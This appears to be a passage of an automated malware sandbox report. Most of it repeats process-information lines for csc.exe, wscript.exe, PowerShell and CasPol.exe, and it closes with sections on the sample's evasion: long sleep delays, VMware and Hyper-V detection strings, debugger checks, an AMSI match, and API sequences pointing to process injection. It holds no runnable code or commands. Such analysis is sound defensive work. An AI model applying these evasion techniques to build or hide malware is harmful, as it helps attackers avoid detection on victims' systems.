                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198C2
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7066Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2645Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4484Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5280Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 3624Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 5870Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_12-52803
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 9.5 %
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 7066 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep count: 2645 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8164Thread sleep count: 224 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8164Thread sleep time: -112000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8168Thread sleep count: 3624 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8168Thread sleep time: -10872000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8168Thread sleep count: 5870 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8168Thread sleep time: -17610000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: powershell.exe, 00000003.00000002.1845557104.0000000005088000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: CasPol.exe, 0000000C.00000002.4182814346.000000000069B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
                        Source: wscript.exe, 00000006.00000002.1832353576.0000000004B3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: powershell.exe, 00000003.00000002.1845557104.0000000005088000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000003.00000002.1854540222.0000000008640000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1854595650.00000000086D5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4182814346.000000000069B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4182814346.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 00000006.00000002.1832353576.0000000004B3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: powershell.exe, 00000007.00000002.2169151013.000000000A2E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4'^qemU
                        Source: powershell.exe, 00000003.00000002.1845557104.0000000005088000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000003.00000002.1854595650.00000000086E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
                        Source: powershell.exe, 00000007.00000002.2116659692.000000000717A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_12-53443
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00442554 mov eax, dword ptr fs:[00000030h]12_2_00442554
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]12_2_10004AB4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,12_2_00410B19
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B44
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433CD7 SetUnhandledExceptionFilter,12_2_00433CD7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_100060E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002639
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10002B1C

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: amsi32_7696.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi32_7696.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_00417245
